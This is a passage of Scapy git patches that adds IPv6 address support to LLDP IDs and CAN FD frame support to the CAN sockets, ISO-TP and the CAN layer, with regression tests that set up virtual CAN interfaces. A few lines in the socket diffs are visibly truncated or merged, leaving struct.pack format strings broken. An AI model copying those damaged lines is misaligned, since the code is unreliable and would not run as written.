lambda pkt: pkt.subtype == 0x04 ), MultipleTypeField([ @@ -375,10 +425,13 @@ class LLDPDUPortID(LLDPDU): ), ( IPField('id', None), - lambda pkt: pkt.subtype == 0x04 + lambda pkt: pkt.subtype == 0x04 and pkt.family == 0x01 + ), + ( + IP6Field('id', None), + lambda pkt: pkt.subtype == 0x04 and pkt.family == 0x02 ), - ], StrLenField('id', '', length_from=lambda pkt: 0 if pkt._length is - None else pkt._length - 1) + ], StrLenField('id', '', length_from=_ldp_id_lengthfrom) ) ] @@ -523,39 +576,6 @@ class LLDPDUManagementAddress(LLDPDU): see https://www.iana.org/assignments/address-family-numbers/address-family-numbers.xhtml # noqa: E501 """ - IANA_ADDRESS_FAMILY_NUMBERS = { - 0x00: 'other', - 0x01: 'IPv4', - 0x02: 'IPv6', - 0x03: 'NSAP', - 0x04: 'HDLC', - 0x05: 'BBN', - 0x06: '802', - 0x07: 'E.163', - 0x08: 'E.164', - 0x09: 'F.69', - 0x0a: 'X.121', - 0x0b: 'IPX', - 0x0c: 'Appletalk', - 0x0d: 'Decnet IV', - 0x0e: 'Banyan Vines', - 0x0f: 'E.164 with NSAP', - 0x10: 'DNS', - 0x11: 'Distinguished Name', - 0x12: 'AS Number', - 0x13: 'XTP over IPv4', - 0x14: 'XTP over IPv6', - 0x15: 'XTP native mode XTP', - 0x16: 'Fiber Channel World-Wide Port Name', - 0x17: 'Fiber Channel World-Wide Node Name', - 0x18: 'GWID', - 0x19: 'AFI for L2VPN', - 0x1a: 'MPLS-TP Section Endpoint ID', - 0x1b: 'MPLS-TP LSP Endpoint ID', - 0x1c: 'MPLS-TP Pseudowire Endpoint ID', - 0x1d: 'MT IP Multi-Topology IPv4', - 0x1e: 'MT IP Multi-Topology IPv6' - } SUBTYPE_MANAGEMENT_ADDRESS_OTHER = 0x00 SUBTYPE_MANAGEMENT_ADDRESS_IPV4 = 0x01 @@ -620,7 +640,7 @@ class LLDPDUManagementAddress(LLDPDU): length_of='management_address', adjust=lambda pkt, x: len(pkt.management_address) + 1), # noqa: E501 ByteEnumField('management_address_subtype', 0x00, - IANA_ADDRESS_FAMILY_NUMBERS), + LLDPDU.IANA_ADDRESS_FAMILY_NUMBERS), XStrLenField('management_address', '', length_from=lambda pkt: 0 if pkt._management_address_string_length is None else diff --git a/test/contrib/lldp.uts b/test/contrib/lldp.uts index 8bddeb32ebe..3310d5ca11d 100644 --- a/test/contrib/lldp.uts +++ b/test/contrib/lldp.uts @@ -83,6 +83,65 @@ assert pkt[LLDPDUPortID].fields_desc[2].i2s == LLDPDUPortID.LLDP_PORT_ID_TLV_SUB assert pkt[LLDPDUChassisID]._length == 7 assert pkt[LLDPDUPortID]._length == 7 += Network families / addresses in IDs + +# IPv4 + +pkt = Ether()/LLDPDUChassisID(subtype=0x05, family=1, id="1.1.1.1")/LLDPDUPortID(subtype=0x04, family=1, id="2.2.2.2")/LLDPDUTimeToLive()/LLDPDUEndOfLLDPDU() +pkt = Ether(raw(pkt)) +assert pkt[LLDPDUChassisID].id == "1.1.1.1" +assert pkt[LLDPDUPortID].id == "2.2.2.2" + +pkt = Ether(hex_bytes(b'ffffffffffff0242ac11000288cc02060501010101010406040102020202060200140000')) +assert pkt[LLDPDUChassisID].id == "1.1.1.1" +assert pkt[LLDPDUPortID].id == "2.2.2.2" + +try: + pkt = Ether()/LLDPDUChassisID(subtype=0x05, family=1, id="2001::abcd")/LLDPDUPortID()/LLDPDUTimeToLive()/LLDPDUEndOfLLDPDU() + assert False +except (socket.gaierror, AssertionError): + pass + +try: + pkt = Ether()/LLDPDUChassisID()/LLDPDUPortID(subtype=0x04, family=1, id="2001::abcd")/LLDPDUTimeToLive()/LLDPDUEndOfLLDPDU() + assert False +except (socket.gaierror, AssertionError): + pass + +# IPv6 + +pkt = Ether()/LLDPDUChassisID(subtype=0x05, family=2, id="1111::2222")/LLDPDUPortID(subtype=0x04, family=2, id="2001::abcd")/LLDPDUTimeToLive()/LLDPDUEndOfLLDPDU() +pkt = Ether(raw(pkt)) +assert pkt[LLDPDUChassisID].id == "1111::2222" +assert pkt[LLDPDUPortID].id == "2001::abcd" + +pkt = Ether(hex_bytes(b'ffffffffffff0242ac11000288cc0212050211110000000000000000000000002222041204022001000000000000000000000000abcd060200140000')) +assert pkt[LLDPDUChassisID].id == "1111::2222" +assert pkt[LLDPDUPortID].id == "2001::abcd" + +try: + pkt = Ether()/LLDPDUChassisID(subtype=0x05, family=2, id="1.1.1.1")/LLDPDUPortID()/LLDPDUTimeToLive()/LLDPDUEndOfLLDPDU() + assert False +except (socket.gaierror, AssertionError): + pass + +try: + pkt = Ether()/LLDPDUChassisID()/LLDPDUPortID(subtype=0x04, family=2, id="1.1.1.1")/LLDPDUTimeToLive()/LLDPDUEndOfLLDPDU() + assert False +except (socket.gaierror, AssertionError): + pass + +# Other + +pkt = Ether()/LLDPDUChassisID(subtype=0x05, id=b"\x00\x07\xab")/LLDPDUPortID(subtype=0x04, id=b"\x07\xaa\xbb\xcc")/LLDPDUTimeToLive()/LLDPDUEndOfLLDPDU() +pkt = Ether(raw(pkt)) +assert pkt[LLDPDUChassisID].id == b"\x00\x07\xab" +assert pkt[LLDPDUPortID].id == b"\x07\xaa\xbb\xcc" + +pkt = Ether(hex_bytes(b'ffffffffffff0242ac11000288cc020505000007ab0406040007aabbcc060200140000')) +assert pkt[LLDPDUChassisID].id == b"\x00\x07\xab" +assert pkt[LLDPDUPortID].id == b"\x07\xaa\xbb\xcc" + + strict mode handling - build = basic frame structure From ada91610ad55339bce4d84bc7d5e44ee1cab0c6f Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Mon, 7 Nov 2022 10:34:37 +0100 Subject: [PATCH 0913/1632] Add support of CANFD (#3782) * Add support of CANFD Co-authored-by: superuserx * fix tests * fix flake * fix test * fix test for python2 * fix test for python2 * fix test for python2 Co-authored-by: superuserx Co-authored-by: Nils Weiss --- scapy/contrib/cansocket_native.py | 28 +++- scapy/contrib/cansocket_python_can.py | 22 +-- scapy/contrib/isotp/isotp_native_socket.py | 11 +- scapy/layers/can.py | 75 ++++++++- test/contrib/canfdsocket_native.uts | 147 +++++++++++++++++ test/contrib/canfdsocket_python_can.uts | 176 +++++++++++++++++++++ test/contrib/cansocket_python_can.uts | 30 ++-- test/contrib/isotp_native_socket.uts | 11 ++ test/pcaps/canfd.pcap.gz | Bin 0 -> 109 bytes test/scapy/layers/can.uts | 72 +++++++-- 10 files changed, 515 insertions(+), 57 deletions(-) create mode 100644 test/contrib/canfdsocket_native.uts create mode 100644 test/contrib/canfdsocket_python_can.uts create mode 100644 test/pcaps/canfd.pcap.gz diff --git a/scapy/contrib/cansocket_native.py b/scapy/contrib/cansocket_native.py index 3cd16f2230b..64783dd824a 100644 --- a/scapy/contrib/cansocket_native.py +++ b/scapy/contrib/cansocket_native.py @@ -18,7 +18,7 @@ from scapy.supersocket import SuperSocket from scapy.error import Scapy_Exception, warning from scapy.packet import Packet -from scapy.layers.can import CAN, CAN_MTU +from scapy.layers.can import CAN, CAN_MTU, CAN_FD_MTU from scapy.arch.linux import get_last_packet_timestamp from scapy.compat import List, Dict, Type, Any, Optional, Tuple, raw, cast @@ -45,6 +45,7 @@ def __init__(self, channel=None, # type: Optional[str] receive_own_messages=False, # type: bool can_filters=None, # type: Optional[List[Dict[str, int]]] + fd=False, # type: bool basecls=CAN, # type: Type[Packet] **kwargs # type: Dict[str, Any] ): @@ -56,6 +57,8 @@ def __init__(self, "the correct one to achieve compatibility with python-can" "/PythonCANSocket. \n'bustype=socketcan'") + self.MTU = CAN_MTU + self.fd = fd self.basecls = basecls self.channel = conf.contribs['NativeCANSocket']['channel'] if \ channel is None else channel @@ -71,6 +74,17 @@ def __init__(self, "Could not modify receive own messages (%s)", exception ) + if self.fd: + try: + self.ins.setsockopt(socket.SOL_CAN_RAW, + socket.CAN_RAW_FD_FRAMES, + 1) + self.MTU = CAN_FD_MTU + except Exception as exception: + raise Scapy_Exception( + "Could not enable CAN FD support (%s)", exception + ) + if can_filters is None: can_filters = [{ "can_id": 0, @@ -95,7 +109,7 @@ def recv_raw(self, x=CAN_MTU): """Returns a tuple containing (cls, pkt_data, time)""" pkt = None try: - pkt = self.ins.recv(x) + pkt = self.ins.recv(self.MTU) except BlockingIOError: # noqa: F821 warning("Captured no data, socket in non-blocking mode.") except socket.timeout: @@ -107,8 +121,9 @@ def recv_raw(self, x=CAN_MTU): # need to change the byte order of the first four bytes, # required by the underlying Linux SocketCAN frame format if not conf.contribs['CAN']['swap-bytes'] and pkt is not None: - pkt = struct.pack("I12s", pkt)) - + pack_fmt = "I12s", bs)) + pack_fmt = " None - - self.basecls = None # type: Optional[Type[Packet]] - try: - self.basecls = cast(Type[Packet], kwargs.pop("basecls")) - except KeyError: - self.basecls = CAN - + self.basecls = cast(Optional[Type[Packet]], kwargs.pop("basecls", CAN)) self.can_iface = SocketWrapper(**kwargs) def recv_raw(self, x=0xffff): @@ -304,18 +299,23 @@ def recv_raw(self, x=0xffff): if conf.contribs['CAN']['swap-bytes']: hdr = struct.unpack("I", hdr))[0] - dlc = msg.dlc << 24 + dlc = msg.dlc << 24 | msg.is_fd << 18 | \ + msg.error_state_indicator << 17 | msg.bitrate_switch << 16 pkt_data = struct.pack("!II", hdr, dlc) + bytes(msg.data) return self.basecls, pkt_data, msg.timestamp def send(self, x): # type: (Packet) -> int + bx = bytes(x) msg = can_Message(is_remote_frame=x.flags == 0x2, is_extended_id=x.flags == 0x4, is_error_frame=x.flags == 0x1, arbitration_id=x.identifier, + is_fd=orb(bx[5]) & 4 > 0, + error_state_indicator=orb(bx[5]) & 2 > 0, + bitrate_switch=orb(bx[5]) & 1 > 0, dlc=x.length, - data=bytes(x)[8:]) + data=bx[8:]) msg.timestamp = time.time() try: x.sent_time = msg.timestamp diff --git a/scapy/contrib/isotp/isotp_native_socket.py b/scapy/contrib/isotp/isotp_native_socket.py index 6d7e747c4e3..2e9a5d49edf 100644 --- a/scapy/contrib/isotp/isotp_native_socket.py +++ b/scapy/contrib/isotp/isotp_native_socket.py @@ -21,7 +21,7 @@ from scapy.config import conf from scapy.arch.linux import get_last_packet_timestamp, SIOCGIFINDEX from scapy.contrib.isotp.isotp_packet import ISOTP -from scapy.layers.can import CAN_MTU, CAN_MAX_DLEN +from scapy.layers.can import CAN_MTU, CAN_FD_MTU, CAN_MAX_DLEN, CAN_FD_MAX_DLEN LIBC = ctypes.cdll.LoadLibrary(find_library("c")) # type: ignore @@ -58,7 +58,9 @@ CAN_ISOTP_DEFAULT_RECV_STMIN = 0x00 CAN_ISOTP_DEFAULT_RECV_WFTMAX = 0 CAN_ISOTP_DEFAULT_LL_MTU = CAN_MTU +CAN_ISOTP_CANFD_MTU = CAN_FD_MTU CAN_ISOTP_DEFAULT_LL_TX_DL = CAN_MAX_DLEN +CAN_FD_ISOTP_DEFAULT_LL_TX_DL = CAN_FD_MAX_DLEN CAN_ISOTP_DEFAULT_LL_TX_FLAGS = 0 @@ -290,6 +292,7 @@ def __init__(self, padding=False, # type: bool listen_only=False, # type: bool frame_txtime=CAN_ISOTP_DEFAULT_FRAME_TXTIME, # type: int + fd=False, # type: bool basecls=ISOTP # type: Type[Packet] ): # type: (...) -> None @@ -329,7 +332,11 @@ def __init__(self, stmin=stmin, bs=bs)) self.can_socket.setsockopt(SOL_CAN_ISOTP, CAN_ISOTP_LL_OPTS, - self.__build_can_isotp_ll_options()) + self.__build_can_isotp_ll_options( + mtu=CAN_ISOTP_CANFD_MTU if fd + else CAN_ISOTP_DEFAULT_LL_MTU, + tx_dl=CAN_FD_ISOTP_DEFAULT_LL_TX_DL if fd + else CAN_ISOTP_DEFAULT_LL_TX_DL)) self.can_socket.setsockopt( socket.SOL_SOCKET, SO_TIMESTAMPNS, diff --git a/scapy/layers/can.py b/scapy/layers/can.py index 1110826dea1..0811c8bf29f 100644 --- a/scapy/layers/can.py +++ b/scapy/layers/can.py @@ -12,17 +12,16 @@ import os import gzip import struct -import binascii from scapy.compat import Tuple, Optional, Type, List, Union, Callable, IO, \ - Any, cast + Any, cast, hex_bytes import scapy.libs.six as six from scapy.config import conf from scapy.compat import orb from scapy.data import DLT_CAN_SOCKETCAN from scapy.fields import FieldLenField, FlagsField, StrLenField, \ - ThreeBytesField, XBitField, ScalingField, ConditionalField, LenField + ThreeBytesField, XBitField, ScalingField, ConditionalField, LenField, ShortField from scapy.volatile import RandFloat, RandBinFloat from scapy.packet import Packet, bind_layers from scapy.layers.l2 import CookedLinux @@ -35,13 +34,16 @@ "LEUnsignedSignalField", "LEFloatSignalField", "BEFloatSignalField", "BESignedSignalField", "BEUnsignedSignalField", "rdcandump", "CandumpReader", "SignalHeader", "CAN_MTU", "CAN_MAX_IDENTIFIER", - "CAN_MAX_DLEN", "CAN_INV_FILTER"] + "CAN_MAX_DLEN", "CAN_INV_FILTER", "CANFD", "CAN_FD_MTU", + "CAN_FD_MAX_DLEN"] # CONSTANTS CAN_MAX_IDENTIFIER = (1 << 29) - 1 # Maximum 29-bit identifier CAN_MTU = 16 CAN_MAX_DLEN = 8 CAN_INV_FILTER = 0x20000000 +CAN_FD_MTU = 72 +CAN_FD_MAX_DLEN = 64 # Mimics the Wireshark CAN dissector parameter # 'Byte-swap the CAN ID/flags field'. @@ -93,6 +95,21 @@ class CAN(Packet): StrLenField('data', b'', length_from=lambda pkt: int(pkt.length)), ] + @classmethod + def dispatch_hook(cls, + _pkt=None, # type: Optional[bytes] + *args, # type: Any + **kargs # type: Any + ): # type: (...) -> Type[Packet] + if _pkt: + fdf_set = len(_pkt) > 5 and orb(_pkt[5]) & 0x04 and \ + not orb(_pkt[5]) & 0xf8 + if fdf_set: + return CANFD + elif len(_pkt) > 16: + return CANFD + return CAN + @staticmethod def inv_endianness(pkt): # type: (bytes) -> bytes @@ -146,6 +163,27 @@ def extract_padding(self, p): bind_layers(CookedLinux, CAN, proto=12) +class CANFD(CAN): + """ + This class is used for distinction of CAN FD packets. + """ + fields_desc = [ + FlagsField('flags', 0, 3, ['error', + 'remote_transmission_request', + 'extended']), + XBitField('identifier', 0, 29), + FieldLenField('length', None, length_of='data', fmt='B'), + FlagsField('fd_flags', 4, 8, ['bit_rate_switch', + 'error_state_indicator', + 'fd_frame']), + ShortField('reserved', 0), + StrLenField('data', b'', length_from=lambda pkt: int(pkt.length)), + ] + + +bind_layers(CookedLinux, CANFD, proto=13) + + class SignalField(ScalingField): """SignalField is a base class for signal data, usually transmitted from CAN messages in automotive applications. Most vehicle manufacturers @@ -427,9 +465,20 @@ class SignalHeader(CAN): 'extended']), XBitField('identifier', 0, 29), LenField('length', None, fmt='B'), - ThreeBytesField('reserved', 0) + FlagsField('fd_flags', 0, 8, ['bit_rate_switch', + 'error_state_indicator', + 'fd_frame']), + ShortField('reserved', 0) ] + @classmethod + def dispatch_hook(cls, + _pkt=None, # type: Optional[bytes] + *args, # type: Any + **kargs # type: Any + ): # type: (...) -> Type[Packet] + return SignalHeader + def extract_padding(self, s): # type: (bytes) -> Tuple[bytes, Optional[bytes]] return s, None @@ -541,10 +590,15 @@ def read_packet(self, size=CAN_MTU): raise EOFError is_log_file_format = orb(line[0]) == orb(b"(") - + fd_flags = None if is_log_file_format: t_b, intf, f = line.split() - idn, data = f.split(b'#') + if b'##' in f: + idn, data = f.split(b'##') + fd_flags = orb(data[0]) + data = data[1:] + else: + idn, data = f.split(b'#') le = None t = float(t_b[1:-1]) # type: Optional[float] else: @@ -559,7 +613,12 @@ def read_packet(self, size=CAN_MTU): data = data.replace(b' ', b'') data = data.strip() - pkt = CAN(identifier=int(idn, 16), data=binascii.unhexlify(data)) + if len(data) <= 8 and fd_flags is None: + pkt = CAN(identifier=int(idn, 16), data=hex_bytes(data)) + else: + pkt = CANFD(identifier=int(idn, 16), fd_flags=fd_flags, + data=hex_bytes(data)) + if le is not None: pkt.length = int(le[1:]) else: diff --git a/test/contrib/canfdsocket_native.uts b/test/contrib/canfdsocket_native.uts new file mode 100644 index 00000000000..17889196b5c --- /dev/null +++ b/test/contrib/canfdsocket_native.uts @@ -0,0 +1,147 @@ +% Regression tests for nativecanfdsocket +~ python3_only not_pypy vcan_socket needs_root linux + +# More information at http://www.secdev.org/projects/UTscapy/ + + +############ +############ ++ Configuration of CAN virtual sockets +~ conf + += Load module +load_layer("can", globals_dict=globals()) +conf.contribs['CANSocket'] = {'use-python-can': False} +from scapy.contrib.cansocket_native import * +conf.contribs['CAN'] = {'swap-bytes': False, 'remove-padding': True} + + += Setup string for vcan +bashCommand = "/bin/bash -c 'sudo modprobe vcan; sudo ip link add name vcan0 type vcan; sudo ip link set dev vcan0 up'" + += Load os +import os +import threading +from time import sleep +from subprocess import call + += Setup vcan0 +assert 0 == os.system(bashCommand) + ++ Basic Packet Tests() += CAN FD Packet init +canfdframe = CANFD(identifier=0x7ff,length=8,data=b'\x01\x02\x03\x04\x05\x06\x07\x08\xaa') +assert bytes(canfdframe) == b'\x00\x00\x07\xff\x08\x04\x00\x00\x01\x02\x03\x04\x05\x06\x07\x08\xaa' + ++ Basic Socket Tests() += CAN FD Socket Init +sock1 = CANSocket(channel="vcan0", fd=True) + += CAN Socket send recv small packet without remove padding + +conf.contribs['CAN'] = {'swap-bytes': False, 'remove-padding': False} + +sock2 = CANSocket(channel="vcan0", fd=True) +sock2.send(CANFD(identifier=0x7ff,length=9,data=b'\x01\x02\x03\x04\x05\x06\x07\x08\xaa')) +sock2.send(CAN(identifier=0x7ff,length=8,data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock2.close() + +rx = sock1.recv() +assert rx == CANFD(identifier=0x7ff,length=9,data=b'\x01\x02\x03\x04\x05\x06\x07\x08\xaa') / Padding(b"\x00" * (64 - 9)) +rx = sock1.recv() +assert rx == CAN(identifier=0x7ff,length=8,data=b'\x01\x02\x03\x04\x05\x06\x07\x08') + + += CAN Socket send recv + +conf.contribs['CAN'] = {'swap-bytes': False, 'remove-padding': True} + +sock2 = CANSocket(channel="vcan0", fd=True) +sock2.send(CANFD(identifier=0x7ff,length=9,data=b'\x01\x02\x03\x04\x05\x06\x07\x08\xaa')) +sock2.close() + +rx = sock1.recv() +assert rx == CANFD(identifier=0x7ff,length=9, fd_flags=4, data=b'\x01\x02\x03\x04\x05\x06\x07\x08\xaa') + += CAN Socket basecls test + + +sock2 = CANSocket(channel="vcan0", fd=True) +sock2.send(CANFD(identifier=0x7ff,length=9,data=b'\x01\x02\x03\x04\x05\x06\x07\x08\xaa')) +sock2.close() + +sock1.basecls = Raw +rx = sock1.recv() +assert rx.load == bytes(CANFD(identifier=0x7ff, fd_flags=4, length=9,data=b'\x01\x02\x03\x04\x05\x06\x07\x08\xaa' + b'\x00' * (64 - 9))) + += sniff with filtermask 0x1FFFFFFF and inverse filter + + +sock1 = CANSocket(channel='vcan0', fd=True, can_filters=[{'can_id': 0x10000000 | CAN_INV_FILTER, 'can_mask': 0x1fffffff}]) + +sock2 = CANSocket(channel="vcan0", fd=True) +sock2.send(CANFD(flags='extended', identifier=0x10010000, length=10, data=b'\x01\x02\x03\x04\x05\x06\x07\x08ab')) +sock2.send(CANFD(flags='extended', identifier=0x10020000, length=10, data=b'\x01\x02\x03\x04\x05\x06\x07\x08ab')) +sock2.send(CANFD(flags='extended', identifier=0x10000000, length=10, data=b'\x01\x02\x03\x04\x05\x06\x07\x08ab')) +sock2.send(CANFD(flags='extended', identifier=0x10030000, length=10, data=b'\x01\x02\x03\x04\x05\x06\x07\x08ab')) +sock2.send(CANFD(flags='extended', identifier=0x10040000, length=10, data=b'\x01\x02\x03\x04\x05\x06\x07\x08ab')) +sock2.send(CANFD(flags='extended', identifier=0x10000000, length=10, data=b'\x01\x02\x03\x04\x05\x06\x07\x08ab')) +sock2.close() + +packets = sock1.sniff(timeout=0.1, verbose=False, count=4) +assert len(packets) == 4 + +sock1.close() + ++ bridge and sniff tests + += bridge and sniff setup vcan1 package forwarding + + +bashCommand = "/bin/bash -c 'sudo ip link add name vcan1 type vcan; sudo ip link set dev vcan1 up'" +assert 0 == os.system(bashCommand) + +sock0 = CANSocket(channel='vcan0', fd=True) +sock1 = CANSocket(channel='vcan1', fd=True) + +bridgeStarted = threading.Event() + +def bridge(): + global bridgeStarted + bSock0 = CANSocket(channel="vcan0", fd=True) + bSock1 = CANSocket(channel='vcan1', fd=True) + def pnr(pkt): + return pkt + bridgeStarted.set() + bridge_and_sniff(if1=bSock0, if2=bSock1, xfrm12=pnr, xfrm21=pnr, timeout=0.2, verbose=False, count=6) + bSock0.close() + bSock1.close() + +threadBridge = threading.Thread(target=bridge) +threadBridge.start() +bridgeStarted.wait(timeout=5) +sock0.send(CANFD(flags='extended', identifier=0x10010000, length=10, data=b'\x01\x02\x03\x04\x05\x06\x07\x0842')) +sock0.send(CANFD(flags='extended', identifier=0x10020000, length=10, data=b'\x01\x02\x03\x04\x05\x06\x07\x0842')) +sock0.send(CANFD(flags='extended', identifier=0x10000000, length=10, data=b'\x01\x02\x03\x04\x05\x06\x07\x0842')) +sock0.send(CANFD(flags='extended', identifier=0x10030000, length=10, data=b'\x01\x02\x03\x04\x05\x06\x07\x0842')) +sock0.send(CANFD(flags='extended', identifier=0x10040000, length=10, data=b'\x01\x02\x03\x04\x05\x06\x07\x0842')) +sock0.send(CANFD(flags='extended', identifier=0x10000000, length=10, data=b'\x01\x02\x03\x04\x05\x06\x07\x0842')) + +packetsVCan1 = sock1.sniff(timeout=0.1, verbose=False, count=6) +assert len(packetsVCan1) == 6 + +threadBridge.join(timeout=5) +assert not threadBridge.is_alive() + +sock1.close() +sock0.close() + + += Delete vcan interfaces + +if 0 != call(["sudo", "ip", "link", "delete", "vcan0"]): + raise Exception("vcan0 could not be deleted") + +if 0 != call(["sudo", "ip", "link", "delete", "vcan1"]): + raise Exception("vcan1 could not be deleted") + diff --git a/test/contrib/canfdsocket_python_can.uts b/test/contrib/canfdsocket_python_can.uts new file mode 100644 index 00000000000..022a1397bb7 --- /dev/null +++ b/test/contrib/canfdsocket_python_can.uts @@ -0,0 +1,176 @@ +% Regression tests for the CANSocket +~ vcan_socket linux needs_root + +# More information at http://www.secdev.org/projects/UTscapy/ + + +############ +############ ++ Configuration of CAN virtual sockets + += Load module +~ conf + +conf.contribs['CAN'] = {'swap-bytes': False, 'remove-padding': True} +load_layer("can", globals_dict=globals()) +conf.contribs['CANSocket'] = {'use-python-can': True} +from scapy.contrib.cansocket_python_can import * + += Setup string for vcan +~ conf command +bashCommand = "/bin/bash -c 'sudo modprobe vcan; sudo ip link add name vcan0 type vcan; sudo ip link set dev vcan0 up'" + += Load os +~ conf command + +import os +import threading +from subprocess import call + += Setup vcan0 +~ conf command + +0 == os.system(bashCommand) + += Define common used functions + +send_done = threading.Event() + +def sender(sock, msg): + if not hasattr(msg, "__iter__"): + msg = [msg] + for m in msg: + sock.send(m) + send_done.set() + ++ Basic Packet Tests() += CAN Packet init + +canframe = CANFD(identifier=0x7ff,length=10,data=b'\x01\x02\x03\x04\x05\x06\x07\x08ab') +bytes(canframe) == b'\x00\x00\x07\xff\x0a\x04\x00\x00\x01\x02\x03\x04\x05\x06\x07\x08ab' + ++ Basic Socket Tests() += CAN Socket Init + +sock1 = CANSocket(bustype='socketcan', channel='vcan0', fd=True) +sock1.close() +del sock1 +sock1 = None + += CAN Socket send recv small packet + +sock1 = CANSocket(bustype='socketcan', channel='vcan0', fd=True) +sock2 = CANSocket(bustype='socketcan', channel='vcan0', fd=True) + +sock2.send(CANFD(identifier=0x7ff,length=10,data=b'\x01'*10)) +sock2.send(CAN(identifier=0x7ff,length=1,data=b'\x01')) +rx1 = sock1.recv() +rx2 = sock1.recv() +sock1.close() +sock2.close() + +assert rx1 == CANFD(identifier=0x7ff,length=10,data=b'\x01'*10) +assert rx2 == CAN(identifier=0x7ff,length=1,data=b'\x01') + + += CAN Socket send recv small packet test with + +with CANSocket(bustype='socketcan', channel='vcan0', fd=True) as sock1, \ + CANSocket(bustype='socketcan', channel='vcan0', fd=True) as sock2: + sock2.send(CANFD(identifier=0x7ff,length=1,data=b'\x01')) + rx = sock1.recv() + +assert rx == CANFD(identifier=0x7ff,length=1,data=b'\x01') + += CAN Socket basecls test + +with CANSocket(bustype='socketcan', channel='vcan0', fd=True) as sock1, \ + CANSocket(bustype='socketcan', channel='vcan0', fd=True) as sock2: + sock1.basecls = Raw + sock2.send(CANFD(identifier=0x7ff,length=8,data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) + rx = sock1.recv() + assert rx == Raw(bytes(CANFD(identifier=0x7ff,length=8,data=b'\x01\x02\x03\x04\x05\x06\x07\x08'))) + += CAN Socket send recv swapped + +conf.contribs['CAN']['swap-bytes'] = True + +with CANSocket(bustype='socketcan', channel='vcan0', fd=True) as sock1, \ + CANSocket(bustype='socketcan', channel='vcan0', fd=True) as sock2: + sock2.send(CANFD(identifier=0x7ff,length=64,data=b'\x01' * 64)) + sock1.basecls = CAN + rx = sock1.recv() + assert rx == CANFD(identifier=0x7ff,length=64,data=b'\x01' * 64) + +conf.contribs['CAN']['swap-bytes'] = False + += sniff with filtermask 0x7ff + +msgs = [CANFD(identifier=0x200, length=64, data=b'\x01\x02\x03\x04\x05\x06\x07\x08' * 8), + CANFD(identifier=0x300, length=64, data=b'\x01\x02\x03\x04\x05\x06\x07\x08' * 8), + CANFD(identifier=0x300, length=64, data=b'\x01\x02\x03\x04\x05\x06\x07\x08' * 8), + CANFD(identifier=0x200, length=64, data=b'\x01\x02\x03\x04\x05\x06\x07\x08' * 8), + CANFD(identifier=0x100, length=64, data=b'\x01\x02\x03\x04\x05\x06\x07\x08' * 8), + CANFD(identifier=0x200, length=64, data=b'\x01\x02\x03\x04\x05\x06\x07\x08' * 8)] + +with CANSocket(bustype='socketcan', channel='vcan0', fd=True, can_filters=[{'can_id': 0x200, 'can_mask': 0x7ff}]) as sock1, \ + CANSocket(bustype='socketcan', channel='vcan0', fd=True) as sock2: + for m in msgs: + sock2.send(m) + packets = sock1.sniff(timeout=0.1, count=3) + assert len(packets) == 3 + + ++ bridge and sniff tests += bridge and sniff setup vcan1 package forwarding + +bashCommand = "/bin/bash -c 'sudo ip link add name vcan1 type vcan; sudo ip link set dev vcan1 up'" +assert 0 == os.system(bashCommand) + +sock0 = CANSocket(bustype='socketcan', channel='vcan0', fd=True) +sock1 = CANSocket(bustype='socketcan', channel='vcan1', fd=True) + +bridgeStarted = threading.Event() +def bridge(): + global bridgeStarted + bSock0 = CANSocket( + bustype='socketcan', channel='vcan0', bitrate=250000, fd=True) + bSock1 = CANSocket( + bustype='socketcan', channel='vcan1', bitrate=250000, fd=True) + def pnr(pkt): + return pkt + bSock0.timeout = 0.01 + bSock1.timeout = 0.01 + bridge_and_sniff(if1=bSock0, if2=bSock1, xfrm12=pnr, xfrm21=pnr, timeout=0.5, started_callback=bridgeStarted.set, count=6) + bSock0.close() + bSock1.close() + +threadBridge = threading.Thread(target=bridge) +threadBridge.start() +bridgeStarted.wait(timeout=1) + +sock0.send(CANFD(flags='extended', identifier=0x10010000, length=64, data=b'\x01\x02\x03\x04\x05\x06\x07\x08' * 8)) +sock0.send(CANFD(flags='extended', identifier=0x10020000, length=64, data=b'\x01\x02\x03\x04\x05\x06\x07\x08' * 8)) +sock0.send(CANFD(flags='extended', identifier=0x10000000, length=64, data=b'\x01\x02\x03\x04\x05\x06\x07\x08' * 8)) +sock0.send(CANFD(flags='extended', identifier=0x10030000, length=64, data=b'\x01\x02\x03\x04\x05\x06\x07\x08' * 8)) +sock0.send(CANFD(flags='extended', identifier=0x10040000, length=64, data=b'\x01\x02\x03\x04\x05\x06\x07\x08' * 8)) +sock0.send(CANFD(flags='extended', identifier=0x10000000, length=64, data=b'\x01\x02\x03\x04\x05\x06\x07\x08' * 8)) + +packetsVCan1 = sock1.sniff(timeout=0.5, count=6) +assert len(packetsVCan1) == 6 + +sock1.close() +sock0.close() + +threadBridge.join(timeout=3) +assert not threadBridge.is_alive() + + += Delete vcan interfaces +~ needs_root linux vcan_socket + +if 0 != call(["sudo", "ip" ,"link", "delete", "vcan0"]): + raise Exception("vcan0 could not be deleted") + +if 0 != call(["sudo", "ip" ,"link", "delete", "vcan1"]): + raise Exception("vcan1 could not be deleted") diff --git a/test/contrib/cansocket_python_can.uts b/test/contrib/cansocket_python_can.uts index 21c12a373b3..7b684f40863 100644 --- a/test/contrib/cansocket_python_can.uts +++ b/test/contrib/cansocket_python_can.uts @@ -294,7 +294,7 @@ sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x0 sock1.send(CAN(flags='extended', identifier=0x80, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) -packetsVCan0 = sock0.sniff(timeout=0.3, count=4) +packetsVCan0 = sock0.sniff(timeout=0.5, count=4) assert len(packetsVCan0) == 4 sock0.close() @@ -336,8 +336,8 @@ sock1.send(CAN(flags='extended', identifier=0x40, length=8, data=b'\x01\x02\x03\ sock1.send(CAN(flags='extended', identifier=0x80, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) sock1.send(CAN(flags='extended', identifier=0x40, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) -packetsVCan0 = sock0.sniff(timeout=0.3, count=4) -packetsVCan1 = sock1.sniff(timeout=0.3, count=6) +packetsVCan0 = sock0.sniff(timeout=0.5, count=4) +packetsVCan1 = sock1.sniff(timeout=0.5, count=6) assert len(packetsVCan0) == 4 assert len(packetsVCan1) == 6 @@ -377,7 +377,7 @@ sock0.send(CAN(flags='extended', identifier=0x10030000, length=8, 